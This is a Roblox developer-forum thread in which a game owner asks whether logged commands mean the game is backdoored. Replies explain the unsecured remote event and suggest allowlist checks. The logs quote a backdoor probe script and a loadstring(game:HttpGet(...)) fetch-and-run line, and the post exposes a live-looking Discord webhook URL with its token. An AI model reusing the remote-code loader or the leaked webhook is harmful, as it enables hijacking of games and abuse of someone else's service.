Help with weird backdoor 'exploit'

Help and Feedback Scripting Support
, ,
#1

I am new to the dev forum, please tell me if this is the wrong section to post this in
A few days ago, I tried to make a admin command usage detector, to see what my mods are doing to ensure they aren’t abusing or anything. Well, I couldn’t figure out how to make it work, but today i got a few extremely suspicious notifications from my admin command detector, here they are:

1. The command -- If all players jump when executed, it means the game is backdoored! 
for i,v in pairs(game:GetService('Players'):GetPlayers()) do
if v.Character ~= nil and v.Character:IsA("Model") and v.Character:FindFirstChildWhichIsA("Humanoid") then
 v.Character:FindFirstChildWhichIsA("Humanoid").Jump = true 
end
end
----- CHANGELOGS ----- -- v1.0.0 | First publish. -- v1.1.0 | New acquire feature V1. ----- CHANGELOGS ----- 
was used by Arthur_gg054

2. *[*2:20 PM*]*

The command 
Instance.new("Model",workspace).Name="ERJGOGEFWUKMPHKRAFBKMMUBCCQNQLCCXAONDVHWFLGLSAVIBSCKGNUMAVIBXNGR"
was used by Arthur_gg054

3. *[*2:21 PM*]*

The command loadstring(game:HttpGet("not showing the link to this exploit on here"))()
was used by Arthur_gg054

This same thing was used by another player as well, and I don’t know why it’s picking this up and I also don’t know if my game is backdoored. Here is the admin command detector as well:

local rem = game:GetService('ReplicatedStorage'):WaitForChild('ALLREMBINDS'):WaitForChild('usedcomandthangg')
local hook = 'https://discordapp.com/api/webhooks/1332167858452430910/YhyZLx3r02B9W2JSpItdLydpB9SPweNZyhq33YDUKp66x2QCm5pfMO6cTiwm8t0Dv0LR'
local htpserv = game:GetService('HttpService')

rem.OnServerEvent:Connect(function(playerwhousedit, commandused)
	-- Debugging outputs
	print("Command used: ", commandused)
	print("Player who used the command: ", playerwhousedit.Name)

	-- Function to send the report
	local function sendreport(cmd, plr)
		local data = {
			['content'] = 'The command ' .. cmd .. ' was used by ' .. plr.Name
		}
		data = htpserv:JSONEncode(data)

		-- Try to send the report
		local success, err = pcall(function()
			htpserv:PostAsync(hook, data)
		end)

		if not success then
			warn("Failed to send report: " .. tostring(err))
		end
	end

	-- Call function with the correct parameters
	sendreport(commandused, playerwhousedit)
end)

if anyone could help or tell me what this stuff means, that would be great!

8 Likes
#2

Move this to #help-and-feedback:scripting-support

Also, since you’re new, i’d like to tell you that you don’t actually have to delete the whole topic, just edit your post, and above the title where it says “Development Discussion” change it to “Help and Feedback - Scripting support”

4 Likes
#3
  1. Do not show your discord webhook link here, anyone can use it
  2. You shouldn’t use a remote script with no sanity check like that, any exploiter can abuse it too
  3. If Arthur_gg054 is an admin, talk with them, and advise them to not use those scripts, the first 2 are unharmful, the loadstring can be dangerous, if Arthur_gg054 is not an admin, remove the admin system you are using and use a better trusted one, and just stop adding anyone as admin, if they run malicious code with those commands, it can end up giving admin permissions to malicious players.

They probably know the game may have a vulnerability and are trying to see if it works, but judging by your code not having sanity checks, i’d say the scripts they are “running”, could actually NOT be running, you need to implement the command check in the server exactly where the command function is used or something to make sure all checks passed and the command is executing

2 Likes
#4

If the code sent through as a command is allowed to run, then you’re in danger and should disable the admin menu immediately.
If you want to test it, just run that jump script through your menu, if you jump, then disable the menu. If not, you’re safe.

You should add a lot more security to the remote if that’s the whole script.

Anyone who decides to exploit can fire the remote event with bogus info, and can do anything.
If your game is on a group, then use group ranks to determine who can and can’t use the event.

local yourGroupId = 00000000 --// The ID for your group
local AdminRank = 253 --// The number rank of the admin role in your group
rem.OnServerEvent:Connect(function(playerwhousedit, commandused)
	if playerwhousedit:GetRankInGroup(yourGroupId) < AdminRank then return end -- this line prevents anyone from using the menu
end)

If you aren’t using a group though, you can just use UserIds instead.

local idList = { --// List of UserIds, people who can use the admin panel.
    0000000000,
    0000000000,
    0000000000
}

--// In the event connection:
if not table.find(idList, playerwhousedit.UserId) then return end

A small downside to this system is that new admins can only use the system in newer servers, but you could simply use datastores to fix the problem.

To answer your question, the most they could do if you scripted your system very poorly and allowed code to be executed, is that a few servers would be backdoored.

Given its very bad if they are backdoored, its a simple fix of shutting down those servers, reverting any changes anyone made and disabling the admin system until its fixed.

Looking at how your system works though, the commandused variable is simply supposed to be a string that then gets passed to call a function of the same name, which is a decent system.
The lack of security though makes it a bad system, as anyone can do anything. You could have a random player ban an entire server.

And also, if the people who used it are admins, revoke their admin, if not, just ban them permanently.

3 Likes
#5

I think I worded this very poorly, I am using HD Admin. This is just a script that detects when the player chats and if the message starts with ‘;’ and contains a certain keyword like ‘kill’ or ‘kick’ or something it fires this remote event. I have sanity checks on all of my remotes, so it’s pretty difficult to exploit in my game. I’m just wondering how that script could have gone through the admin command checker? Here is the localscript that fires the remoteevent whenever a command is detected:

repeat task.wait() until game:IsLoaded()
local rs = game:GetService('ReplicatedStorage')
local remotes = rs:WaitForChild('ALLREMBINDS')
local oncmdremote = remotes:WaitForChild('usedcomandthangg')
local player = game.Players.LocalPlayer

local stuffforstringgssssss = {
	'fly',
	'kick',
	'ban',
	'fling',
	'kill',
	'size',
	'punish',
	'respawn',
	're',
}

local function onchatted(message)
	local lowered = string.lower(message)
	for _, word in pairs(stuffforstringgssssss) do
		if string.find(lowered, ';'..word) then
			oncmdremote:FireServer(player, ';'..word)
		end
	end
end

local TextChatService = game:GetService("TextChatService")
TextChatService.MessageReceived:Connect(function(message)
	if message.TextSource.UserId == game.Players.LocalPlayer.UserId then
		onchatted(message.Text)
	end
end)
1 Like
#6

Alright, I think i figured it out whenever this guy found the remote and said f you in the discord through the bot. I need to add sanity checks to the admin command usage checker. I also figured out that the reason it is logging these is because the scripts are using ; to separate lines (i think).

2 Likes
#7

Are you sure those scripts are being executed? And if they are actually being executed, are you using the official HD Admin by ForeverHD? (this one: https://create.roblox.com/store/asset/857927023/HD-Admin)

Also, please get a new Discord Webhook URL as it can be used by anyone who has it now.

2 Likes
#8

I’m quite sure, I don’t see why else that would pop up. Also yes, im using the official hd admin.

2 Likes
#9

also i banned one of the exploiters :smiley:

3 Likes
#10

They probably thought firing the remote would execute commands / scripts then, instead they sent logs to your webhook.

As long as there was nothing happening in-game and all you got was logs, then it’d be safe to assume your game isn’t backdoored and it’s just that you’re lacking sanity checks in the log script.

I’m not sure how you detect if someone is a staff member with HD Admin as I’ve not used the system but in the mean time you can make a sanity check with @Chark_Proto’s suggestion

2 Likes
#11

Anyone chatting anything with “;” would get logged, it doesn’t check for admins only, the logs you received aren’t really scripts getting executed

2 Likes
#12

this might be true, but im pretty sure i made it so it only fires if it also includes a certain keyword after ;

1 Like
#13

This topic was automatically closed 14 days after the last reply. New replies are no longer allowed.